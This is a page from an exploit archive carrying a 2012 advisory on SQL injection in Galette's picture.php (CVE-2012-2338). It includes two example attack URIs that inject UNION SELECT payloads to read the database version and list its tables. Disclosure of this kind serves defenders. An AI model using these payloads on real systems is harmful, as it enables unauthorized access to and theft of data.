Galette SQL Injection

Galette SQL Injection: Posted May 14, 2012; Authored by sbz; Galette versions prior to 0.7.x are vulnerable to a remote SQL injection vulnerability in picture.php.; tags | exploit, remote, php, sql injection; advisories | CVE-2012-2338; SHA-256 | a2ce6c5fd8c67c90ac3d11efc210f31a32fca23d17b133853c14b72af1fb973f; Download | Favorite | View

Galette SQL Injection

Source: http://www.securityfocus.com/bid/53463/info
 
Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Versions prior to Galette 0.7.x are vulnerable.
 
Attackers can use a browser to exploit this issue.
 
The following example URIs are available.
 
http://server/picture.php?id_adh=0+and+1=0+union+select+@@version,null
 
http://server/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Galette SQL Injection

Galette SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Galette SQL Injection

Share This

Galette SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems